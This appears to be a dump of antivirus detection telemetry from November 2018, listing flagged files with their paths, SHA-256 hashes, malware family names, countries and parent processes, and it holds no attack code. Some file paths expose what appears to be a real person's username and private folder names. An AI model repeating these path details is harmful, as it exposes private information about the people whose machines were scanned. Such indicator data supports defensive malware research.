  Row(detection=Row(filename='avscan-20181101-152509-d3cfc9c2', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_15112da0\\AVSCAN-20181101-125042-39787734\\AVSCAN-20181101-152509-D3CFC9C2', filesize=576000, name='TR/Agent.2d9bff.#M1.#R1'), hash='2d9bffb5b2cd0a3d0251d753856f11d6b3fc6a26eedd17c9bbbefe52eafce55b', metadata=Row(cmdline=None, country='BR', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T17:25:00Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='tcupdater.exe', filepath='\\\\?\\C:\\Users\\X\\AppData\\Local\\TCSystem\\TCUpdater.exe', filesize=1088000, name='HEUR/APC.#M1.#R1'), hash='2778037bc22ff4333facb7e8bedea1523bd7a63a6a7476142b497339a65d269e', metadata=Row(cmdline=None, country='RU', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-01T23:02:59Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='at_richiesta.doc', filepath='AT_Richiesta.doc', filesize=192000, name='W97M/Agent.57918243.#M0.#R0'), hash='76a3f1717ad2ae8516e5f109758e8c421d5c563112c2ac1ce6b7f40cc3062367', metadata=Row(cmdline=None, country='DE', os_name='MacOS', os_vmajor='17', os_vminor='7', parentproc=None, parentsize=None, timestamp='2018-11-01T18:00:26Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='autorun.exe', filepath='E:\\Autorun.exe', filesize=1152000, name='HEUR/APC.#M1.#R1'), hash='3606a529040d3201d305e1624f739663c2341bb5e04965ee9c8636bf67a55c93', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\explorer.exe', parentsize=3229696, timestamp='2018-11-01T21:12:46Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='outside caller 08-26-2016 17e395c.zip', filepath='Outside Caller 08-26-2016 17e395c.zip', filesize=8000, name='HEUR/Suspar.Gen.#M0.#R0'), hash='22f75846c98f01d3c621aff911fa633dd4dc915fe1106ecdf7bc9cbcc811b4cb', metadata=Row(cmdline=None, country='NL', os_name='MacOS', os_vmajor='17', os_vminor='7', parentproc=None, parentsize=None, timestamp='2018-11-01T14:57:12Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='pmbservicemailsender.exe', filepath='E:\\Program Files (x86)\\Sony\\PMB\\PMBServiceMailSender.exe', filesize=256000, name='W32/Neshta.A.#M1.#R1'), hash='a2ee6cec323e6222acd777528779cff0251cf7101afcc967ec7ab8c709bb810e', metadata=Row(cmdline='-m:aeinv.dll -f:UpdateSoftwareInventoryW', country='BR', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Windows\\System32\\CompatTelRunner.exe', parentsize=None, timestamp='2018-11-01T03:50:43Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='spideypc.exe', filepath='\\\\?\\K:\\اسبيدر-مان\\SPIDEYPC.EXE', filesize=1536000, name='W32/Virut.Gen.#M1.#R1'), hash='db81618b6aa236269f4bc22cbea77fd4cb910ec9df27848e34f275146e50e1a2', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-01T21:08:54Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='setup337.exe', filepath='C:\\Users\\X\\AppData\\Local\\Temp\\e3qvhp4gngc\\Setup337.exe', filesize=1472000, name='TR/Dropper.MSIL.Gen.#M300.#R5304'), hash='d4db4d74240a34b066207a80080cadd428136c7dd2b8b60d08d42f7559f37e4e', metadata=Row(cmdline='2 3.1541071136.5bdae120631c4', country='US', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files\\Free\\704346535.exe', parentsize=671232, timestamp='2018-11-01T11:58:56Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-151726-54dec4b3', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_3db4e496\\AVSCAN-20181101-145735-7096FD0F\\AVSCAN-20181101-151726-54DEC4B3', filesize=512000, name='DR/Vilsel.piv.#M1.#R1'), hash='d9d8fcfcdf53b63ec7a8dfd24a2086e31f8c19e146ac30e3af30e293c84fa17b', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T08:17:33Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-095714-91b0b503', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_318d9040\\AVSCAN-20181101-093330-80B14946\\AVSCAN-20181101-095714-91B0B503', filesize=512000, name='DR/Vilsel.piv.#M1.#R1'), hash='d9d8fcfcdf53b63ec7a8dfd24a2086e31f8c19e146ac30e3af30e293c84fa17b', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T02:57:21Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-093836-bb6b1172', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_318d9040\\AVSCAN-20181101-093330-80B14946\\AVSCAN-20181101-093836-BB6B1172', filesize=512000, name='DR/Vilsel.piv.#M1.#R1'), hash='d9d8fcfcdf53b63ec7a8dfd24a2086e31f8c19e146ac30e3af30e293c84fa17b', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T02:38:43Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='newfolder.exe', filepath='E:\\NewFolder.exe', filesize=0, name='TR/Patched.Ren.Gen.#M2.#R3780'), hash='e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T10:56:24Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='a0016443.exe', filepath='\\\\?\\D:\\System Volume Information\\_restore{4BC09F2B-3D9F-48B4-B911-965A060CD3E4}\\RP16\\A0016443.exe', filesize=320000, name='HEUR/APC.#M1.#R1'), hash='be3f5d77e6635fdc86a8179f5640fcc127ab946009115fd21138b3184de73d90', metadata=Row(cmdline=None, country='VN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T01:33:03Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='c6ffd4f3e688eaadae948904295007628b26eedfe29c00cbad7cdf3b420b3cd8', filepath='D:\\TotalAutomation\\CategorizationLayer\\Binaries 31.10.2018-32\\C6FFD4F3E688EAADAE948904295007628B26EEDFE29C00CBAD7CDF3B420B3CD8', filesize=1600000, name='TR/Dropper.Gen.#M300.#R7636'), hash='c6ffd4f3e688eaadae948904295007628b26eedfe29c00cbad7cdf3b420b3cd8', metadata=Row(cmdline='x -iext -ow -ver \\\\\\"-an=C:\\\\\\\\Users\\\\\\\\X\\\\\\\\Downloads\\\\\\\\Binaries 31.10.2018-36.7z\\\\\\" \\\\\\"-an=C:\\\\\\\\Users\\\\\\\\Admin\\\\\\\\Downloads\\\\\\\\Binaries 31.10.2018-31.7z\\\\\\" \\\\\\"-an=C:\\\\\\\\Users\\\\\\\\Admin\\\\\\\\Downloads\\\\\\\\Binaries 31.10.2018-32.7z\\\\\\" \\\\\\"-an=C:\\\\\\\\Users\\\\\\\\Admin\\\\\\\\Downloads\\\\\\\\Binaries 31.10.2018-33.7z\\\\\\" \\\\\\"-an=C:\\\\\\\\Users\\\\\\\\Admin\\\\\\\\Downloads\\\\\\\\Binaries 31.10.2018-34.7z\\\\\\" -- \\\\\\"C:\\\\\\\\Users\\\\\\\\Admin\\\\\\\\Downloads\\\\\\\\Binaries 31.10.2018-35.7z\\\\\\" \\\\\\"?\\\\\\\\\\\\\\"', country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\WinRAR\\WinRAR.exe', parentsize=1407440, timestamp='2018-11-01T15:09:04Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='cxwoxfdi.exe', filepath='G:\\Files are hidden by Trojan\\RECYCLER\\S-0-7-08-8026522526-7122263011-714661711-6462\\CXWOxFDI.exe', filesize=128000, name='W32/Virut.Gen.#M1.#R1'), hash='bb6eff6c9655c890f0d38ddcffbed35c70e720cd1b4e90472e23ff251161108c', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\explorer.exe', parentsize=2616320, timestamp='2018-11-01T11:01:44Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='ristorazione.exe', filepath='E:\\Didattica\\Sgb\\condivisa\\SORZI\\TUTTO STORICO\\chiavetta engim 2017\\MODULI ENGIM\\CORSI NUOVI DEFINIITIVI\\schede presentazione corsi\\schede ultime APRILE 2016\\ristorazione.exe', filesize=1600000, name='TR/Patched.Ren.Gen4.#M300.#R300179'), hash='dbbba6122f8e506938da13a7b6a38c765c4600d8db1ef90d90e2c97600adb0b1', metadata=Row(cmdline=None, country='IT', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-01T20:15:15Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='service.vir', filepath='\\\\?\\C:\\Applications\\Service.VIR', filesize=14208000, name='HEUR/AGEN.1011898.#M1.#R1'), hash='cc1bacb51504c5d20b1731381216a48412d4950f233e7010b46dcc5f2216e345', metadata=Row(cmdline=None, country='PH', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T09:21:41Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='intro europa.exe', filepath='E:\\Didattica\\Sgb\\condivisa\\SORZI\\TUTTO STORICO\\CHIAVETTA TESI\\TESI MASTER\\intro europa.exe', filesize=1600000, name='TR/Patched.Ren.Gen4.#M300.#R300179'), hash='dbbba6122f8e506938da13a7b6a38c765c4600d8db1ef90d90e2c97600adb0b1', metadata=Row(cmdline=None, country='IT', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-01T20:20:36Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='setup337.exe', filepath='\\\\?\\C:\\Users\\X\\AppData\\Local\\Temp\\2tddajhl40f\\Setup337.exe', filesize=1472000, name='TR/Dropper.MSIL.Gen.#M300.#R5304'), hash='d4db4d74240a34b066207a80080cadd428136c7dd2b8b60d08d42f7559f37e4e', metadata=Row(cmdline=None, country='BR', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-01T15:32:54Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='setup337.exe', filepath='\\\\?\\C:\\Users\\X\\AppData\\Local\\Temp\\ljrqf0pv4ru\\Setup337.exe', filesize=1472000, name='TR/Dropper.MSIL.Gen.#M300.#R5304'), hash='d4db4d74240a34b066207a80080cadd428136c7dd2b8b60d08d42f7559f37e4e', metadata=Row(cmdline=None, country='MX', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-01T16:27:02Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='setup337.exe', filepath='C:\\Users\\X\\AppData\\Local\\Temp\\dr132dkbkad\\Setup337.exe', filesize=1472000, name='TR/Dropper.MSIL.Gen.#M300.#R5304'), hash='d4db4d74240a34b066207a80080cadd428136c7dd2b8b60d08d42f7559f37e4e', metadata=Row(cmdline='\\\\\\/3 ', country='BR', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc='C:\\Windows\\System32\\Taskmgr.exe', parentsize=1103768, timestamp='2018-11-01T11:41:24Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-212650-0841cfb2', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_de0729a5\\AVSCAN-20181101-211656-B20B1D6E\\AVSCAN-20181101-212650-0841CFB2', filesize=576000, name='TR/Dldr.Stantinko.be854f.#M1.#R1'), hash='be854f2a34ba3f398eb409c41f271270079bbd139e4bdd0f203b071e09ea0b3d', metadata=Row(cmdline=None, country='RU', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc=None, parentsize=None, timestamp='2018-11-01T18:27:12Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='trconsole.exe', filepath='\\\\?\\UNC\\s-s\\rarus\\TRConsole\\TRConsole.exe', filesize=6464000, name='W32/Alman.BB.#M1.#R1'), hash='e42b805fb971a947c7d5e0dee8bbec2c64e41b6cb9b0549de38d6b5d935520c8', metadata=Row(cmdline=None, country='RU', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T02:27:22Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='setup337.exe', filepath='\\\\?\\C:\\Users\\X\\AppData\\Local\\Temp\\alxwj12kv0z\\Setup337.exe', filesize=1472000, name='TR/Dropper.MSIL.Gen.#M300.#R5304'), hash='d4db4d74240a34b066207a80080cadd428136c7dd2b8b60d08d42f7559f37e4e', metadata=Row(cmdline=None, country='IQ', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc=None, parentsize=None, timestamp='2018-11-01T15:53:22Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='engim.exe', filepath='E:\\Didattica\\Sgb\\condivisa\\SORZI\\TUTTO STORICO\\ENGIM\\ENGIM.exe', filesize=1600000, name='TR/Patched.Ren.Gen4.#M300.#R300179'), hash='dbbba6122f8e506938da13a7b6a38c765c4600d8db1ef90d90e2c97600adb0b1', metadata=Row(cmdline=None, country='IT', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-01T20:21:41Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-194258-7ab297b4', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_adeb3106\\AVSCAN-20181101-194239-77A35965\\AVSCAN-20181101-194258-7AB297B4', filesize=640000, name='TR/Crypt.ASPM.Gen.#M300.#R4882'), hash='eb274eff0102f18fd7c13ba96efc4e9849bb80aa78dea30fa1f64e23b7411c61', metadata=Row(cmdline=None, country='IL', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-01T17:42:57Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-093933-c644bdce', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_318d9040\\AVSCAN-20181101-093330-80B14946\\AVSCAN-20181101-093933-C644BDCE', filesize=512000, name='DR/Vilsel.piv.#M1.#R1'), hash='d9d8fcfcdf53b63ec7a8dfd24a2086e31f8c19e146ac30e3af30e293c84fa17b', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T02:39:40Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='etabs_2015.exe', filepath='c:\\users\\X\\downloads\\instalador etabs\\sicet15v150122164b\\csi etabs 2015 version 15.0.0.1221 (64bit)\\keygen\\etabs_2015.exe', filesize=1152000, name='TR/Black.Gen2.#M300.#R100338'), hash='49122a4c62ca3899baaee3cbe273b2981a28785b1a12f1f5d2456df00079a019', metadata=Row(cmdline=None, country='BO', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc=None, parentsize=None, timestamp='2018-11-04T18:40:23Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='tmp0001f49d', filepath='C:\\Windows\\Temp\\bdcore_tmp\\2532\\tmp000004cb\\tmp0001f49d', filesize=256000, name='HEUR/AGEN.1014173.#M1.#R1'), hash='9c4d032e352d7f2bf17d974642258620bff3144a84199019f5cbe1053932c674', metadata=Row(cmdline=None, country='IR', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc='C:\\Program Files\\Bitdefender\\Endpoint Security\\epsecurityservice.exe', parentsize=98136, timestamp='2018-11-04T20:22:10Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='etabs_2015.exe', filepath='D:\\otheruser\\CASF\\00 - Softwares\\CSI ETABS 2015 version 15.0.0.1221 [32-64 Bit] - [FirstUploads]\\32-Bit\\License Generator\\etabs_2015.exe', filesize=1152000, name='TR/Black.Gen2.#M300.#R100338'), hash='49122a4c62ca3899baaee3cbe273b2981a28785b1a12f1f5d2456df00079a019', metadata=Row(cmdline='-m:appraiser.dll -f:DoScheduledTelemetryRun -cv:zbPIjsVPk0KS41L2.1', country='PH', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Windows\\System32\\CompatTelRunner.exe', parentsize=None, timestamp='2018-11-04T02:45:52Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='tmp00023d8c', filepath='C:\\Windows\\Temp\\bdcore_tmp\\2532\\tmp000004cb\\tmp00023d8c', filesize=256000, name='HEUR/AGEN.1014173.#M1.#R1'), hash='9c4d032e352d7f2bf17d974642258620bff3144a84199019f5cbe1053932c674', metadata=Row(cmdline=None, country='IR', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc='C:\\Program Files\\Bitdefender\\Endpoint Security\\epsecurityservice.exe', parentsize=98136, timestamp='2018-11-04T20:41:42Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181104-065338-2ff5f78a', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_1c2dbe3b\\AVSCAN-20181104-065200-1E52085D\\AVSCAN-20181104-065338-2FF5F78A', filesize=1536000, name='TR/Crypt.XPACK.Gen.#M1.#R1'), hash='5f28ee2b6f85211912fd7283bc72088a22b75457293cfa31a4b3428ac82f35a4', metadata=Row(cmdline=None, country='BB', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T10:53:43Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='optsatadc.dll', filepath='C:\\Windows\\SysWOW64\\optsatadc.dll', filesize=384000, name='TR/Crypt.XPACK.Gen.#M300.#R4115'), hash='395ee8c70f2d152207d1ea3ecccdf2a48dd64b4e7b301898c3dfb2ca25937f17', metadata=Row(cmdline=None, country='RU', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T13:42:42Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='fxsound enhancer plus v26.008.exe', filepath='C:\\Users\\X\\Downloads\\FXSound Enhancer Plus v26.008\\FXSound Enhancer Plus v26.008.exe', filesize=16248000, name='TR/Downloader.62e9ff.#M1.#R1'), hash='62e9ffc879f6369bff969fd40843d1dbce69dd8c593afb694fa4c544bafef058', metadata=Row(cmdline=None, country='RO', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Windows\\explorer.exe', parentsize=3932672, timestamp='2018-11-04T14:08:55Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='uninstaller.exe', filepath='\\\\?\\C:\\Program Files\\IBZLUTVP79\\uninstaller.exe', filesize=64000, name='TR/Dropper.Gen.#M300.#R4133'), hash='9706a9c3c65a749f585c2bfe8777732513b60494ab309387c307f022b265d223', metadata=Row(cmdline=None, country='PK', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-04T14:04:55Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='temp6.exe', filepath='\\\\?\\I:\\Ghost\\Fannan NewLook 6 Fin\\Software\\Fannan-Software\\Software\\docs\\Others\\Temp6.exe', filesize=192000, name='HEUR/APC.#M1.#R1'), hash='41a8de209f6048b8fafae7098fb49a3ef39b7d245835f6083f2a13af5f6abc8a', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T21:45:15Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181104-174951-7568f6a2', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_5bb5a5ae\\AVSCAN-20181104-174417-4ABC2321\\AVSCAN-20181104-174951-7568F6A2', filesize=5600000, name='PUA/MyPCBackup.#M1.#R1'), hash='6faf0ee307903290e31e2097dae91d0439aa112ba2e53a53f9f23ef5798e1a82', metadata=Row(cmdline=None, country='IL', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T15:49:54Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='tmp00023d7d', filepath='C:\\Windows\\Temp\\bdcore_tmp\\2532\\tmp000004cb\\tmp00023d7d', filesize=256000, name='HEUR/AGEN.1014173.#M1.#R1'), hash='9c4d032e352d7f2bf17d974642258620bff3144a84199019f5cbe1053932c674', metadata=Row(cmdline=None, country='IR', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc='C:\\Program Files\\Bitdefender\\Endpoint Security\\epsecurityservice.exe', parentsize=98136, timestamp='2018-11-04T20:41:40Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='firefox1.exe', filepath='G:\\BACKUP-DATA-SINTA\\DATA TGL 4 NOVEMBER 2018\\SINSIN\\SINTA\\MOZILLAF\\FIREFOX1.EXE', filesize=100000, name='W32/Sality.#M1.#R1'), hash='959c113563d137bd94429eec17e15a99087299596701ba90c87b186ef8693cb3', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='5', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T03:06:27Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='tmp0002434f', filepath='C:\\Windows\\Temp\\bdcore_tmp\\2532\\tmp000004cb\\tmp0002434f', filesize=256000, name='HEUR/AGEN.1014173.#M1.#R1'), hash='9c4d032e352d7f2bf17d974642258620bff3144a84199019f5cbe1053932c674', metadata=Row(cmdline=None, country='IR', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc='C:\\Program Files\\Bitdefender\\Endpoint Security\\epsecurityservice.exe', parentsize=98136, timestamp='2018-11-04T20:46:53Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181104-154152-fc923563', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_77a591b5\\AVSCAN-20181104-153928-E609A74D\\AVSCAN-20181104-154152-FC923563', filesize=5632000, name='TR/Crypt.XPACK.Gen2.#M1.#R1'), hash='30832edce2c0babe49a581af32e7e4a87e257d22598bdcc3e501c0cecb1b33be', metadata=Row(cmdline=None, country='BR', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T17:41:56Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181104-154356-0ff6c56c', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_77a591b5\\AVSCAN-20181104-154024-EED9F8A3\\AVSCAN-20181104-154356-0FF6C56C', filesize=5632000, name='TR/Crypt.XPACK.Gen2.#M1.#R1'), hash='30832edce2c0babe49a581af32e7e4a87e257d22598bdcc3e501c0cecb1b33be', metadata=Row(cmdline=None, country='BR', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T17:43:57Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181104-132714-5fb9b540', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_e41ed6c7\\AVSCAN-20181104-130254-F168F468\\AVSCAN-20181104-132714-5FB9B540', filesize=704000, name='Worm/IRCBot.ms.70.#M1.#R1'), hash='9bae2ceb5837b566649673b6901c8972db02bace8d10a9c9fbdc32fab0b5988f', metadata=Row(cmdline=None, country='MX', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T19:27:13Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='carryiteasy.exe', filepath='D:\\Kituri\\CarryItEasy.exe', filesize=4224000, name='W32/Neshta.A.#M1.#R1'), hash='29e9958210b893a3fd1d979c875afd6edad086428d9a5a6cc10fe25ddd1821d5', metadata=Row(cmdline=None, country='RO', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\explorer.exe', parentsize=3231232, timestamp='2018-11-04T18:38:07Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avirasecuritycenteragent.exe', filepath='c:\\program files (x86)\\avira\\antivirus\\avirasecuritycenteragent.exe', filesize=840000, name='W32/Sality.Patched.#M1.#R1'), hash='4d3390f1bd3f6b3986e670c2eabfea2e528541ac16d0a33f07254858aaf4e781', metadata=Row(cmdline='\\/LOGFILE=\\"C:\\\\ProgramData\\\\Avira\\\\Antivirus\\\\LOGFILES\\\\AviraSecurityCenterAgent-2018-11-04-06-16-44.log\\" \\/LOGLEVEL=\\"STANDARD\\" \\/UPDATE_WSC=\\"ENABLE\\" \\/VDFDATE=\\"2018-10-17T00:00:00\\" \\/TRIGGER=\\"gpschd.dll Cyclic Check\\"', country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\Avira\\Antivirus\\sched.exe', parentsize=248312, timestamp='2018-11-04T02:46:59Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='abrites commander for renault.exe', filepath='C:\\Program Files (x86)\\ABRITES software for ID 1714AD\\Renault\\ABRITES Commander for Renault.exe', filesize=52224000, name='HEUR/AGEN.1012527.#M1.#R1'), hash='8d1bb169f68c43de6c061551e9dc56f028a15101cd3044f028a4724b3f35a723', metadata=Row(cmdline='Global\\\\\\\\UsGthrFltPipeMssGthrPipe1_ Global\\\\\\\\UsGthrCtrlFltPipeMssGthrPipe1 1 -2147483646 \\\\\\"Software\\\\\\\\Microsoft\\\\\\\\Windows Search\\\\\\" \\\\\\"Mozilla\\\\\\/4.0 (compatible; MSIE 6.0; Windows NT; MS Search 4.0 Robot)\\\\\\" \\\\\\"C:\\\\\\\\ProgramData\\\\\\\\Microsoft\\\\\\\\Search\\\\\\\\Data\\\\\\\\Temp\\\\\\\\usgthrsvc\\\\\\" \\\\\\"DownLevelDaemon\\\\\\" ', country='TR', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\SearchProtocolHost.exe', parentsize=164352, timestamp='2018-11-04T21:12:04Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='1_13_5_0.html', filepath='C:\\Users\\This\\AppData\\Local\\VirtualStore\\Program Files (x86)\\Adobe\\Photoshop 7.0\\Help\\1_13_5_0.html', filesize=220000, name='VBS/Ramnit.abcd.#M0.#R0'), hash='1e3c79f51c7d4464d8458ea6a59d28171bfee43c507058aafa79877b3d29859e', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor=None, parentproc=None, parentsize=None, timestamp='2018-11-04T12:12:50Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='pes2013.exe', filepath='\\\\?\\D:\\PES 200013\\pes2013.exe', filesize=20000000, name='W32/Ramnit.C.#M1.#R1'), hash='936a7bb3003416d18d1932545061d91bf18884e5b1d70aba1d2704b8bc6e97f3', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T08:50:04Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='~1a02f2cb.tmp', filepath='/Users/ralfdressler/Dropbox/.dropbox.cache/~1a02f2cb.tmp', filesize=128000, name='HEUR/AGEN.1008383.#M15.#R1008383'), hash='413fe9a5c16921a255eb2eca53d943c08089ac54b246501d5424ce0b27341c2d', metadata=Row(cmdline=None, country='DE', os_name='MacOS', os_vmajor='15', os_vminor='6', parentproc=None, parentsize=None, timestamp='2018-11-04T12:47:32Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181104-160728-f9f35fff', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_0a27669a\\AVSCAN-20181104-160537-E9C28039\\AVSCAN-20181104-160728-F9F35FFF', filesize=256000, name='TR/Dropper.Gen.#M1.#R1'), hash='2bd310998055ce78ad91a9f366d94b970fd4b4f4c1de14e3bd57a7fc1de1bbc4', metadata=Row(cmdline=None, country='AR', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T19:07:29Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='tmp00000133', filepath='C:\\Windows\\Temp\\tmp00000258\\tmp00000133', filesize=8932000, name='PUA/WinThruster.EL.1.#M1.#R1'), hash='64b46a0d05b19c1c86d8ac8257e356780ad7a327b9fc9ebd3c5db5631efc69dd', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Program Files\\ITbrain\\AntiMalware\\ITbrain_AntiMalware_Service.exe', parentsize=5719344, timestamp='2018-11-04T13:57:14Z'), dt=datetime.date(2018, 11, 4)),
